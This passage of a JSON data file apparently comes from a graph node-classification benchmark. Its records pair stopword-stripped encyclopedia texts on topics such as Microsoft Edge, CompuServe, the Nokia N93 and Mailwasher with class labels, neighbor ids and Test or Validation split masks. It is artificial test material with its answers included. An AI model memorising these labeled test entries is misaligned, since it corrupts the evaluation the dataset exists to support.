    "text": "Expertization:expertization expertization process authentication object usually sort collected individual authority committee authorities expert expert committee examines collectible issues certificate typically including experts apply mark signature item attesting genuineness expertization particularly common valuable philatelic items often forged may unsaleable without",
    "neighbors": [
      5433
    ],
    "mask": "Test"
  },
  {
    "node_id": 4324,
    "label": 2,
    "text": "Nokia_N93:nokia n93 nokia n93 smartphone nokia part multimedia nseries introduced 25 april 2006 released july 2006 runs symbian os v9.1 s60 3rd edition interface advanced camera phone nokia time release particularly marketed camcorder packed unique swivel design like predecessor nokia n90 n93 improved upon camera capabilities n90 phone 3.2-megapixel camera carl zeiss optics 3x optical zoom first nokia phone well 30 fps 640×480 vga mpeg-4 video recording capability succeeded nokia n93i well coming 2 colors pearl black silver also nokia n93 golf edition preloaded pro session golf software help improve golf skills also edition included memory card preloaded movie mission impossible iii theme although nokia planned release n-gage application n93 alongside n73 n93i never made due memory issues",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      690,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 4325,
    "label": 4,
    "text": "Mailwasher:mailwasher mailwasher email filtering software windows detect delete spam user email mail server downloaded user computer mailwasher developed new zealand based company firetrust uses combination user defined filters spam databases bayesian filtering filter works small portion email allows unwanted emails directly deleted user pop3 inbox without downloading email client user computer approach intended prevent downloading spam messages infected malware two versions program free version access single mail account contain bayesian learning filter pro version access multiple accounts additional features",
    "neighbors": [
      6762,
      8747,
      6797,
      7983,
      4272,
      3032,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 4326,
    "label": 2,
    "text": "Microsoft_Edge:microsoft edge microsoft edge web browser developed microsoft first released windows 10 xbox one 2015 android ios 2017 macos 2019 edge includes integration cortana extensions hosted microsoft store unlike internet explorer edge support legacy activex bho technologies originally built microsoft edgehtml chakra engines 2019 edge rebuilt chromium-based browser using blink v8 engines part change codenamed anaheim microsoft intends add support windows 7 8 8.1 macos according statcounter edge still lower market share internet explorer market share combined microsoft browsers place second chrome traditional pcs microsoft edge default web browser windows 10 windows 10 mobile xbox one consoles replacing internet explorer 11 internet explorer mobile development release dependent model windows service included windows 10 enterprise long-term servicing branch ltsb builds microsoft initially announced edge would support legacy trident mshtml layout engine backwards compatibility later said due strong feedback edge would use new engine internet explorer would continue provide legacy engine favorites reading list browsing history downloads viewed hub sidebar providing functionality similar internet explorer ’ downloads manager favorites center browser includes integrated adobe flash player internal whitelist allowing flash applets facebook websites load automatically bypassing security controls requiring user activation pdf reader also supports asm.js edge support legacy technologies activex browser helper objects instead uses extension system internet explorer 11 remains available alongside edge windows 10 compatibility remains nearly identical windows 8.1 version use edge engine previously announced edge integrates microsoft online platforms order provide voice control search functionality dynamic information related searches within address bar users make annotations web pages stored shared onedrive ca n't save html pages computers also integrates reading list function provides reading mode strips unnecessary formatting pages improve legibility preliminary support browser extensions added march 2016 build 14291 three extensions initially supported microsoft indicated delay allowing extensions small number due security concerns edgehtml proprietary layout engine developed edge fork trident removed legacy code older versions internet explorer rewritten majority source code support web standards interoperability modern browsers edgehtml written c++ rendering engine first released experimental option internet explorer 11 part windows 10 preview 9926 build edgehtml meant fully compatible webkit layout engine used safari chrome browsers microsoft stated edge–webkit differences bugs ’ interested fixing review engine beta windows 10 build anandtech found substantial benchmark improvements trident particularly javascript engine performance come par google chrome benchmarks focusing performance webgl api found edgehtml perform much better google chrome mozilla firefox edge originally lacked support open media standards webm opus later added edge 14.14291. edge 17 scored 492/555 html5test comparable firefox 59 scored 491/555 lagging behind chrome 66 scored 528/555 chromium-based microsoft edge four channels overall canary dev short developer beta stable microsoft collectively calls canary dev beta channels microsoft edge insider channels december 2014 writing zdnet technology writer mary jo foley reported microsoft developing new web browser codenamed spartan windows 10 said spartan would treated new product separate internet explorer internet explorer 11 retained alongside compatibility early january 2015 verge obtained details surrounding spartan sources close microsoft including reports would replace internet explorer desktop mobile versions windows 10 microsoft officially unveiled spartan windows 10-focused keynote january 21 2015 described separate product internet explorer final name announced spartan first made publicly available default browser windows 10 technical preview build 10049 released march 30 2015 new engine used spartan available windows 10 builds part internet explorer 11 microsoft later announced internet explorer would deprecated windows 10 would use spartan engine april 29 2015 build conference keynote announced spartan would officially known microsoft edge browser logo branding designed maintain continuity branding internet explorer project spartan branding used versions released build 2015 june 25 microsoft released version 19.10149 windows 10 mobile included new brand june 28 version 20.10158 followed desktop versions also including updated branding july 15 microsoft released version 20.10240 final release insiders version rolled consumers july 29 august 12 microsoft started preview program next version microsoft edge released version 20.10512 mobile-users 6 days later followed version 20.10525 desktop users preview received multiple updates november 5 2015 microsoft released version 25.10586 final release edge second public release desktop users november 12 update rolled desktop users xbox one users part new xbox experience update november 18 update windows 10 mobile finally november 19 update also made available part windows server 2016 technical preview 4 november 2017 microsoft released ports edge android ios apps feature integration synchronization desktop version windows 10 pcs due platform restrictions factors ports use layout engine desktop version instead use os-native webkit-based engines april 2018 edge added tab audio muting june 2018 support web authentication specifications added windows insider builds support windows hello external security tokens december 6 2018 microsoft announced intent base edge chromium source code using rendering engine google chrome enhancements developed microsoft also announced versions edge available windows 7 windows 8 macos versions updated frequent basis january 6 2019 microsoft integrated newsguard internet news trustworthiness extension beta version microsoft edge ios android april 8 2019 first chromium-based builds edge windows released public may 20 2019 first chromium-based preview builds edge macos released public marking first time 13 years microsoft browser available mac platform last time microsoft browser available mac platform microsoft internet explorer mac withdrawn january 2006 june 2019 iama post reddit edge developer stated theoretically possible linux version developed future work actually started possibility june 19 2019 microsoft made chromium-powered edge browser available windows 7 windows 8 testing early benchmarks edgehtml engine—included first beta release edge windows 10 build 10049—had drastically better javascript performance trident 7 internet explorer 11 similar performance google chrome 41 mozilla firefox 37 sunspider benchmark edge performed faster browsers benchmarks operated slower google chrome mozilla firefox opera later benchmarks conducted version included 10122 showed significant performance improvement compared ie11 edge back 10049 according microsoft benchmark result iteration edge performed better chrome firefox google octane 2.0 apple jetstream benchmark july 2015 edge scored 377 555 points html5test chrome 44 firefox 42 scored 479 434 respectively internet explorer 11 scored 312 august 2015 microsoft released windows 10 build 10532 insiders included edge 21.10532.0 beta version scored 445 555 points html5test release windows 10 build 14390 insiders july 2016 html5test score browser development version 460 555 points chrome 51 scored 497 firefox 47 scored 456 safari 9.1 scored 370 june 2016 microsoft published benchmark results prove superior power efficiency edge comparison major web browsers opera questioned accuracy provided test results opera came top independent testing pc world confirmed microsoft results however tests conducted linus sebastian contradicted microsoft results instead showing chrome best battery performance august 2015 review windows 10 dan grabham techradar microsoft edge praised performance despite feature-complete state launch andrew cunningham ars technica praised browser tremendously promising much better browser internet explorer ever criticized lack functionality launch thom holwerda osnews criticized edge august 2015 hidden url bar lack user friendliness poor design tab system utterly broken never shipped final release described browser implemented features sort cosmic joke saying infuriating n't even begin describe data august 2015 weeks release showed user uptake edge low 2 overall computer users using new browser among windows 10 users usage peaked 20 dropped 14 august 2015 october 2015 security researcher published report outlining bug edge inprivate mode causing data related visited sites still cached user profile directory theoretically making possible others determine sites visited bug gained mainstream attention early february 2016 fixed cumulative update february 9 microsoft planned switch chromium edge engine faced mixed reception move increase consistency web platform compatibility major browsers reason move attracted criticism reduces diversity overall web browser market increases influence google developer blink layout engine overall browser market microsoft ceding independently-developed browser engine",
    "neighbors": [
      513,
      6657,
      517,
      11270,
      9736,
      5643,
      4624,
      2579,
      537,
      6171,
      540,
      9757,
      1054,
      3102,
      7713,
      9762,
      8227,
      8740,
      10791,
      9768,
      1577,
      9770,
      10281,
      7212,
      559,
      2101,
      4661,
      3639,
      10808,
      3643,
      2108,
      9275,
      10812,
      64,
      3648,
      582,
      10310,
      1098,
      5707,
      7754,
      4173,
      4174,
      10828,
      9808,
      10831,
      4178,
      10834,
      11345,
      6231,
      10839,
      8281,
      603,
      2139,
      6747,
      9819,
      3170,
      8296,
      1129,
      1642,
      8299,
      9834,
      622,
      9839,
      9841,
      4210,
      115,
      4722,
      4213,
      7796,
      119,
      1656,
      2169,
      4728,
      4731,
      6265,
      637,
      7290,
      10879,
      1664,
      2182,
      8841,
      6797,
      2193,
      9874,
      10900,
      8854,
      4248,
      7838,
      8351,
      10910,
      9377,
      3235,
      4771,
      6820,
      1703,
      7340,
      2221,
      7857,
      9394,
      5300,
      9908,
      7351,
      185,
      11449,
      10428,
      2749,
      4797,
      2244,
      7364,
      8391,
      200,
      11466,
      9420,
      7885,
      10957,
      11469,
      9424,
      2262,
      4310,
      2777,
      8923,
      2782,
      737,
      9442,
      4836,
      2279,
      1770,
      4331,
      3308,
      4844,
      10993,
      3834,
      8443,
      1791,
      8959,
      11519,
      259,
      9987,
      7943,
      1802,
      1807,
      3856,
      278,
      3350,
      3351,
      8473,
      8985,
      11546,
      8988,
      7965,
      5413,
      11559,
      1832,
      297,
      1834,
      3881,
      5928,
      6441,
      10024,
      7983,
      10026,
      10029,
      1844,
      9525,
      11060,
      823,
      10039,
      11572,
      6972,
      2880,
      3394,
      10057,
      11082,
      2893,
      3407,
      3922,
      339,
      4439,
      5465,
      2402,
      2919,
      11112,
      2922,
      4458,
      6506,
      8557,
      9066,
      6513,
      9843,
      9593,
      2943,
      6528,
      1409,
      3971,
      7044,
      3462,
      8584,
      1418,
      5003,
      5004,
      6028,
      8080,
      6034,
      7572,
      5526,
      4505,
      11677,
      8607,
      929,
      5026,
      11683,
      11693,
      430,
      6062,
      944,
      10673,
      8627,
      438,
      9655,
      6584,
      1978,
      5054,
      960,
      8132,
      6086,
      6088,
      969,
      3535,
      4048,
      8659,
      11221,
      5078,
      9688,
      1498,
      5082,
      5594,
      478,
      479,
      482,
      6114,
      6115,
      5605,
      10722,
      487,
      8169,
      6637,
      494,
      9709,
      1520,
      6641,
      7152,
      3573,
      1526,
      5622,
      6133,
      5114,
      2046
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4327,
    "label": 0,
    "text": "MeaningCloud:meaningcloud meaningcloud software service product enables users embed text analytics semantic processing application system previously branded textalytics meaningcloud extends concept semantic api cloud-based framework makes integration semantic processing system something close plug-and-play experience meaningcloud available saas mode on-premises advanced apis provide functionality optimized diverse applications ease use addition customization integration capabilities offer fast learning curve short time obtain results meaningcloud brand meaningcloud llc wholly owned subsidiary meaningcloud europe s.l. previously known daedalus daedalus founded 1998 jose c gonzalez colleagues spin-off artificial intelligence research lab technical university madrid",
    "neighbors": [
      1890,
      4194,
      7780,
      8554,
      2059,
      5677,
      847,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4328,
    "label": 3,
    "text": "Empire_City:_1931:empire city 1931 also known street fight shooting gallery game originally released arcades 1986 game players taking mafia 1931 new york city gunning mobsters one one versions game released family computer 1987 msx 1988 acclaim advertised release nintendo entertainment system western regions console version remained exclusive japan seibu kaihatsu eventually released follow-up game dead angle game set 1931 new york city player controls young man must avenge family members killed gang shootout period several months targets mobsters culminating mafia boss players move crosshair around screen aim shoot mobsters one time lurk around various areas including street windows arrow appears helps direct players location next mobster onscreen players set amount time find shoot enemy time running speech bubble appears counting last seconds timer timer reaches zero player shot screen pans location enemy defend button available last resort avoid shot players replenish ammo shooting hidden ammunition boxes get bonus points shooting gold bars levels cleared set number mobsters eliminated game final level player one opportunity assassinate mob boss walks front windows building final level completed game loops back beginning famicom version largely player progress restored time famicom version using password system four numbers and/or letters review computer video games said game fast moving lots action called unusual addictive game bound winner",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4329,
    "label": 0,
    "text": "Artificial_Solutions:artificial solutions artificial solutions multinational technology company develops technology enable enterprises rapidly build conversational ai systems allow users converse applications electronic devices free-format natural language using speech text touch gesture delivered teneo conversational ai development analytics platform company ’ technology allows business users developers collaborate creating conversational applications 35 languages running os device without need specialist linguistic skills company natural language solutions deployed wide range industries including automotive finance energy entertainment telecoms public sector retail travel company founded 2001 went public 2019 reverse takeover indentive ab artificial solutions listed nazdaq first north stock exchange ticker asai artificial solutions founded stockholm 2001 friends johan åhlund johan gustavsson michael söderström create interactive web assistants using combination artificial intelligence natural language processing though åhlund initially took persuading thought sounded ridiculous talking virtual agent internet company expanded development online customer service optimization products 2005 several offices throughout europe supporting development sales online virtual assistants artificial solutions placed visionary latest gartner magic quadrant crm web customer service applications 2006 artificial solutions acquired kiwilogic german software house creating virtual assistants elbot artificial solutions ’ test-bed explore psychology human-machine communication loebner prize 2008 closest contestant annual competition based turing test reach 30 threshold fooling 25 human judges change management 2010 company started focus basis technology natural language interaction launched teneo platform allows people hold humanlike intelligent conversations applications services running electronic devices 2013 artificial solutions launched indigo mobile personal assistant able operate remember context conversation across different platforms operating systems new round funding announced june 2013 9.4m used support expansion us market february 2014 artificial solutions announced teneo network knowledge patented intelligent framework enables users interact using natural language private shared public ecosystem devices also known internet things lawrence flynn remains ceo chris bushnell cfo",
    "neighbors": [
      6208
    ],
    "mask": "None"
  },
  {
    "node_id": 4330,
    "label": 4,
    "text": "Certified_Senders_Alliance:certified senders alliance certified senders alliance initiated eco german direct marketing association ddv constitutes central whitelist since 2004 csa whitelist positive list email bulk senders isps email-providers participating whitelist solicited email need enter isps spamfilter longer chances false positives legitimate email erroneously tagged spam reduced bulk email senders apply certification whitelist comply admission criteria closed-loop authentication providing masthead revocation unsubscribe functions clear identity sole technological control servers used send emails applicants submit samples services prove csa criteria implemented also pay fee applications reviewed certification committee date 100 providers participate whitelist csa cooperates eco complaints office internet users report breaches csa criteria csa frequently discloses members breached csa criteria excluded whitelist among providers joined csa whitelist aol arcor freenet host europe group microsoft vodafone kabel deutschland pironet united internet companies gmx 1 1 internet web.de well yahoo yandex year csa holds congress csa summit current legal requirements regarding email marketing discussed general data protection regulation well technical challenges trends",
    "neighbors": [
      488,
      7834,
      9901
    ],
    "mask": "None"
  },
  {
    "node_id": 4331,
    "label": 5,
    "text": "CompuServe:compuserve compuserve compuserve information service also known initialism cis first major commercial online service provider united states described 1994 oldest big three information services others prodigy america online dominated field 1980s remained major influence mid-1990s peak early 1990s cis known online chat system message forums covering variety topics extensive software libraries computer platforms series popular online games notably megawars iii island kesmai also known introduction gif format pictures gif exchange mechanism 1997 17 years h r block acquired cis parent announced desire sell company complex deal worked worldcom acting broker resulting cis sold aol 2015 verizon acquired aol including compuserve division 2017 verizon completed acquisition yahoo compuserve became part verizon newly formed oath inc. subsidiary compuserve founded 1969 compu-serv network inc. columbus ohio subsidiary golden united life insurance focus business customers though golden united founder harry gard sr. son-in-law jeffrey wilkins widely miscredited first president compuserve first president john r. goltz wilkins replaced goltz ceo within first year operation goltz wilkins graduate students electrical engineering university arizona early recruits university included sandy trevor inventor compuserve cb simulator chat system doug chinnock larry shelley company objectives twofold provide in-house computer processing support golden united life insurance develop independent business computer time-sharing industry renting time pdp-10 midrange computers business hours spun separate company 1975 trading nasdaq symbol cmpu concurrently company recruited executives shifted focus offering time-sharing services customers wrote applications one focused packaged applications first new executives robert tillson left service bureau corporation subsidiary control data corporation originally formed division ibm become compuserve executive vice president marketing recruited charles mccall followed jeff wilkins ceo later became ceo medical information firm hbo co. maury cox became ceo departure mccall robert massey followed cox ceo 1977 compuserve board changed company name compuserve incorporated 1979 began offering dial-up online information service consumers 1980 h r block acquired compuserve aol entry pc market 1991 marked beginning end cis aol charged 2.95 hour versus 5.00 hour compuserve aol used freely available gui-based client compusserve n't free supported subset system functionality response cis lowered hourly rates several occasions subsequently aol switched monthly subscription instead hourly rates active users aol much less expensive late 1994 compuserve offering unlimited use standard services including news sports weather ... limited electronic mail 8.95 per month new york times called probably best deal cis number users grew peaking april 1995 3 million worldwide point aol 20 million users united states alone peak 27 million due customers leaving lower-cost offerings 1997 number users leaving online services dialup internet service providers reaching climax original 1969 dial-up technology fairly simple—the local phone number cleveland example line connected time-division multiplexer connected via leased line matched multiplexer columbus connected time-sharing host system earliest buildups line terminated single machine compuserve host different numbers used reach different computers later central multiplexers columbus replaced pdp-8 minicomputers pdp-8s connected dec pdp-15 minicomputer acted switches phone number tied particular destination host finally compuserve developed packet switching network implemented dec pdp-11 minicomputers acting network nodes installed throughout us later countries interconnected time compuserve network evolved complicated multi-tiered network incorporating asynchronous transfer mode atm frame relay fr internet protocol ip x.25 technologies 1981 times explained compuserve technology one sentence compuserve offering video-text-like service permitting personal computer users retrieve software mainframe computer telephone lines new york times described international big three noted reached local phone call 700 cities compuserve also world leader commercial services one financial services group collected consolidated financial data myriad data feeds including compustat disclosure i/b/e/s well price/quote feeds major exchanges compuserve developed extensive screening reporting tools used many investment banks wall street 1979 radio shack marketed residential information service micronet home users accessed computers evening hours compuserve computers otherwise idle success prompted compuserve drop micronet name favor compuserve origin approximately concurrent source services operating early 1979 first online services micronet made popular issue 2 commodore disk user included instructions connect run micronet programs mid-1980s compuserve one largest information networking services companies largest consumer information service operated commercial branches 30 us cities selling primarily network services major corporations throughout united states consumer accounts could bought computer stores box instruction manual trial account login awareness service extremely high 1987 consumer side would 50 compuserve revenues corporate culture entrepreneurial encouraging skunkworks projects alexander sandy trevor secluded weekend writing cb simulator chat system soon became one cis popular features instead hiring employees manage forums contracted sysops received compensation based success forum boards libraries chat areas july 1980 working associated press compuserve began hosting text versions columbus dispatch new york times virginian-pilot ledger star washington post san francisco examiner san francisco chronicle los angeles times added 1981 additional newspapers followed although accessing articles newspapers made 5 compuserve traffic reading entire newspaper using method impractical text 0.20 print edition newspaper would take two six hours download cost 5 per hour 6 p.m. another major unit compuserve compuserve network services formed 1982 generate revenue selling connectivity nationwide packet network compuserve built support time-sharing service compuserve designed manufactured network processors based dec pdp-11 wrote software ran network often erroneously called x.25 network compuserve network implemented mixture standardized proprietary layers throughout network one proprietary layers called adaptive routing adaptive routing system implemented two powerful features one network operated entirely self-discovery mode new switch added network connecting neighbor via leased telephone circuit new switch discovered absorbed network without explicit configuration change network configuration needed add remove connections network would automatically reconfigure second feature implemented adaptive routing often talked network engineering circles implemented cns establishing connection paths basis real-time performance measurements one circuit became busy traffic diverted alternative paths prevent overloading poor performance users cns network based x.25 protocol network presented standard x.25 interface outside world providing dialup connectivity corporate hosts allowing compuserve form alliances private networks tymnet telenet among others gave compuserve largest selection local dial-up phone connections world era network usage charges expensive still lower long distance charges networks permitted compuserve access still locations including international locations usually substantial connect-time surcharges common early 1980s pay 30-per-hour charge connect compuserve time cost 5 6 per hour factoring connect-time surcharges resulted company nicknamed compuspend compu erve ci cns primary supplier dial-up communications credit-card authorizations 20 years competence developed long relationship visa international peak line business compuserve carried millions authorization transactions month representing several billion dollars consumer purchase transactions many businesses always-on connection extravagance dialup option made better sense today service remains operation deeply embedded within verizon see competitors remaining market company notable introducing number online services personal computer users compuserve began offering electronic mail capabilities technical support commercial customers 1978 name infoplex also pioneer real-time chat market cb simulator service introduced february 21 1980 first public commercial multi-user chat program compuserve also introduced number online games around 1981 compuserve introduced compuserve b protocol file-transfer protocol allowing users send files later expanded higher-performance b+ version intended downloads cis although b+ protocol widely supported software used default time cis b+ protocol later extended include host-micro interface hmi mechanism communicating commands transaction requests server application running mainframes hmi could used front end client software present gui-based interface cis without use error-prone cli route commands compuserve began expand reach outside united states entered international arena japan 1986 fujitsu nissho iwai developed japanese-language version compuserve called nifty-serve 1989 1993 compuserve hong kong launched joint venture hutchison telecom able acquire 50,000 customers dialup isp frenzy 1994 1995 fujitsu compuserve co-developed worldsaway interactive virtual world 2014 original world launched compuserve 1995 known dreamscape still operating late 1980s possible log compuserve via worldwide x.25 packet switching networks bridged onto compuserve existing us-based network gradually introduced direct dial-up access network many countries economical solution network expansion compuserve also extended marketing commercial services opening branches london munich compuserve first online service offer internet connectivity albeit limited access early 1989 connected proprietary e-mail service allow incoming outgoing messages exchanged internet-based e-mail addresses early 1990s compuserve hundreds thousands users visiting thousands moderated forums forerunners discussion sites web like web many forums managed independent producers administered forum recruited moderators called sysops among many hardware software companies offered customer support broadened audience primarily business users technical geek crowd migrated byte magazine apos bix online service special forums special groups many relatively large premiums premium data bases charges 7.50 time enter search request 1992 compuserve hosted first known wysiwyg e-mail content forum posts fonts colors emoticons encoded 7-bit text-based messages via third party product navcis dvorak development running dos windows 3.1 windows 95 operating systems navcis included features offline work similar offline readers used bulletin board systems allowing users connect service exchange new mail forum content largely automated fashion run complete user edited messages locally offline mode system also allowed interactive navigation system support services like chat system many services remained text based compuserve later introduced compuserve information manager cim compete directly aol unlike navigator cim tuned online work used point-and-click interface similar aols later versions interacted hosts using hmi communications protocol areas service support hmi older text-based interface could used wincim also allowed caching forum messages news articles e-mail reading posting could performed off-line without incurring hourly connect costs previously luxury navcis autosig tapcis applications power users one big advantages cis internet users could purchase services software compuserve members using compuserve account early 1990s hourly rate fell 10 hour 1.95 hour march 1992 launched online signups credit card based payments desktop application connect online check emails april 1995 compuserve topped three million members still largest online service provider launched netlauncher service providing www access capability via spry mosaic browser aol however introduced far cheaper flat-rate unlimited-time advertisement-supported price plan us compete compuserve hourly charges conjunction aol marketing campaigns caused significant loss customers compuserve responded similar plan 24.95 per month late 1997 world wide web grew popularity general public company company closed once-busy compuserve customer support forums offer customer support larger audience directly company websites area compuserve forums time could address yet introduced universal www access 1992 compuserve acquired mark cuban company microsolutions 1997 compuserve began converting forums proprietary host-micro interface hmi html web standards 1997 change discontinued text based access forums forums accessible web well thorough compuserve proprietary hmi protocol 2004 compuserve discontinued hmi converted forums web access forums remained active compuserve.com end 2017 compuserve made number acquisitions history acquired h r block compuserve special military section help veterans military brats members non-members 1994-founded military brats america mba connect later mba established bulletin board within vietnam veterans america aol portal widespread adoption internet world wide web united kingdom first national major-brands online shopping service developed uk arm compuserve/cis part proprietary closed-system collection consumer services andrew gray set compuserve uk operations european arm us company back late 1980s later became company european general manager david gilroy compuserve uk director customer services service continued grow offered technical support managed suzanne gautier sales managed colin campbell service proposed paul stanfield independent business-to-consumer electronic commerce consultant martin turner product marketing director cis uk august 1994 turner agreed project started september rapid market research product development sales online space major uk retail catalogue companies included wh smith tesco virgin/our price great universal stores/gus interflora dixons retail past times pc world retailer innovations service launched thursday 27 april 1995 paul stanfield purchase book wh smith shop repeat first formal test service 9 february 1995 included secure payment subsequent fulfilment order royal mail postal delivery interactive media retail group imrg uk industry association e-retailing believes uk first national shopping service secure online transaction purchase wh smith book compuserve centre approximately 1,000,000 uk customers access shops time british retailers first major exposure medium retailers joined service soon included sainsbury wine jaguar cars branded lifestyle goods compuserve uk commissioned writer sue schofield produce 'retail pack including new uk compuserve book free cd-rom containing cis software access service compuserve closed private network system slow react rapid development open world wide web long major uk retailers started develop web sites independently compuserve original compuserve user ids consisted seven octal digits form 7xxxx xx legacy pdp-10 architecture later eight nine octal digits form 7xxxx xxx 7xxxx xxxx finally ten octal digits form 1xxxxx xxxx generated advance issued printed snap paks 1989 compuserve users email access internet using user id form xxxxx.xxxx compuserve.com comma original id replaced period 1996 users allowed create alias internet e-mail address could also used personal web page longest-term members allowed first choice new addresses 1998 users offered option switching mailbox newer system provided pop3 access via internet internet mail program could used current compuserve email addresses look like xxxxxx cs.com users compuserve 2000 service compuserve long history offering custom portal compuserve information service airline industry beginning 1970s compuserve offered customized version service allows pilots flight attendants bid flight schedules airline compuserve offered customized solutions industries well including service called compuserve lawyers another african-american culture arts forum long largest online service provider 1987 compuserve 380,000 subscribers compared 320,000 dow jones news/retrieval 80,000 source 70,000 genie compuserve 3 million worldwide users peak compared aol 27 million early 1999 many home uses switched standard dial-up internet access compuserve slipped 2 million largely business professional users one popular use compuserve 1980s file exchange particularly pictures indeed 1985 hosted perhaps first online comic world witches stitches compuserve introduced simple black-and-white image format known rle run-length-encoding standardize images could shared among different microcomputer platforms introduction powerful machines universally supporting color compuserve introduced much capable gif format invented steve wilhite gif went become de facto standard 8-bit images internet early mid-1990s compuserve outside telecommunications attorney randy may led appeals federal communications commission fcc exempt data networks pay common carrier access charge ccac levied telephone local exchange carriers primarily baby bell companies long distance carriers primary argument data networking brand new industry country would better served exposing important new industry aberrations voice telephone economics ccac mechanism used subsidize cost local telephone service long distance revenue fcc agreed compuserve position consequence dial-up networking united states whether private networks public internet much less expensive otherwise would 1991 compuserve sued defamation one early cases testing application traditional law internet cubby v. compuserve although defamatory content posted one forums compuserve liable content unaware content exercise editorial control forum november 1993 copyright infringement lawsuit regarding 900 songs settled two years later payment divided among publishers whose songs involved 1995 compuserve blocked access sex-oriented newsgroups pressured bavarian prosecutors 1997 compuserve reopened newsfeeds felix somm former managing director compuserve germany charged violating german child pornography laws material compuserve network carrying germany first convicted november 1997 another hearing sentenced two years probation may 28 1998 cleared appeal november 17 1999 wow styled wow online service run compuserve starting march 1996 closure announced november year effective end january 1997 among promised features first internet service offered monthly 'unlimited rate 17.95 software bugs random shutdowns service loss email messages limited service small loyal fan base closed january 31 1997 several class-action lawsuits filed claiming wow sold stockholders false misleading information wow supposed make company competitive aol proprietary service aimed families novice computer users late-1995 announced wow information service supposed commence microsoft windows 95 sr2 first include internet explorer knowing bundling browser would considered anti-competitive microsoft also planned bundle installers several major isps windows compuserve software ready aol retained wow.com domain name since acquired compuserve kept dormant shutdown wow 2007 mid-2007 aol considered moving digg-style news aggregator hosted netscape.com wow.com ultimately moving propeller.com toward end year aol reportedly working using domain social networking service focused popular online role-playing game world warcraft october 2010 2015 shutdown moved subdomain joystiq wow.com domain simultaneously relaunched deal day site similar groupon however site also short-lived shutting late 2011 january 2019 wow.com search engine powered bing using back-end aol search part oath inc battle customers aol compuserve became one handing customers back forth using free hours enticements technical problems—the thousands new generation u.s. robotics dialup modems deployed network would crash high call volumes first time decades compuserve began losing money prodigious rate effort code-named red-dog initiated convert compuserve long-time pdp-10 based technologies servers based intel x86 architectures microsoft windows nt operating system parent h r block going management changes time beginning retirement ceo henry bloch series successors ensured 1997 h r block announced intention divest compuserve number potential buyers came forefront terms offered unacceptable management aol likely buyer made several offers purchase compuserve using aol stock h r block management sought cash least higher quality stock february 1998 john w. sidgmore vice chairman worldcom former ceo uunet devised complex transaction ultimately met goals parties step one worldcom purchased shares compuserve 1.2 billion wcom stock next day worldcom sold compuserve information service portion company aol retaining compuserve network services portion aol turn sold networking division advanced network services ans worldcom sidgmore said point world balance accountants taxes aol information services worldcom networks worldcom newly acquired compuserve network services renamed worldcom advanced networks continued operate discrete company within worldcom combined aol network subsidiary ans existing worldcom networking company called gridnet 1999 worldcom acquired mci became mci worldcom worldcom advanced networks briefly became mci worldcom advanced networks mci worldcom advanced networks ultimately absorbed uunet soon thereafter worldcom began spiral bankruptcy re-emerging mci 2006 mci sold verizon result organization networking business within compuserve part verizon business process splitting compuserve two major businesses compuserve information services compuserve network services worldcom aol desired make use compuserve name trademarks consequently jointly owned holding company formed purpose hold title various trademarks patents intellectual property license intellectual property cost worldcom verizon aol 2015 verizon acquired aol compuserve original properties reunited verizon september 2003 compuserve information service become division aol added compuserve basic product lines selling via netscape.com cis positioned value market-provider several million customers part aol web products group recent u.s. versions compuserve client software — essentially enhanced web browser — used gecko layout engine developed mozilla within derivative aol client using aol dialup network previous compuserve service offering re-branded compuserve classic remained available us also countries compuserve 2000 offered uk germany compuserve 2000 introduced 1999 withdrawn 2001 failure german market compuserve classic service remained compuserve germany introduced products dialup dsl internet access client software called compuserve 4.5 light january 2007 compuserve e-mail members windows vista supported suggested switching aol-branded service like many older programs however compuserve client software run windows vista compatibility mode july 2007 compuserve pacific announced cessation august 31 2007 september 2007 announced compuserve france would close operations november 30 2007 pacific region australia new zealand etc fujitsu australia ran compuserve pacific franchise 1998 35,000 customers towards end operations area thought far fewer compuserve pacific pricing plans changed since 1998 e.g. 14.95 2 hours per month july 2008 compuserve germany informed customers would close operations july 31 2008 legacy service compuserve classic would affected decision compuserve forums tightly linked compuserve channels compuserve.com currently runs slightly trimmed-down version now-defunct netscape.com web portal latter shut 2006 compuserve announced april 15 2009 compuserve classic would longer operate internet service provider would close june 30 2009 compuserve classic services including ourworld web pages taken offline date compuserve classic e-mail users would able continue using compuserve e-mail addresses via new e-mail system aol used compuserve brand compuserve 2000 rebranded low-cost offering closed 2011 including mac compuserve dialer low-cost dialup isp became web portal compuserve announced november 2017 compuserve forums would shut december 15 2017 36 years since compuserve forums begun 1981 moved forumania elsewhere time several graphical user interfaces written accessing compuserve unlike aol gave free new york times wrote compuserve ought give away among names wincim tapcis navcis time subscribers paid timed access well long distance calls countries spend time online reading replying messages goal bypass compuserve wincim interface streamline sending pre-written email forum postings user written offline receiving new messages downloading requested files logging compuserve tapcis access program compuserve information service automated ms-dos-based software application sped access management compuserve email accounts forum memberships pc users 1981 2004 advances compuserve technology rendered obsolete described archaic-looking .. remains powerful tool accessing compuserve forums tapcis written borland turbo pascal howard banner marketing executive wilmington delaware joined compuserve 1981 died melanoma june 1990 aged 44 software shareware retailed community users continued maintain website since able issue administrative commands tapcis preferred tool dozens compuserve system operators sysops regarding wincim predecessor cim pc magazine wrote give broader view available using easily navigate service explicitly caution unlike tapcis wo n't save money ... could actually take longer retrieve answer messages ... without although ozcis ozwin windows-based successor described free personal use pc magazine shareware like wincim tapcis navcis programming done steve sneed using pascal-like delphi software published ozarks west software inc. like tapcis sysop features moving deleting messages administering file libraries flagging users giving/denying sysop rights unlike offline readers tapcis navcis added proprietary ways formatting text colors fonts attributes ozwin always remained plain text never displayed custom styles may 2005 compuserve discontinued access ozcis tapcis 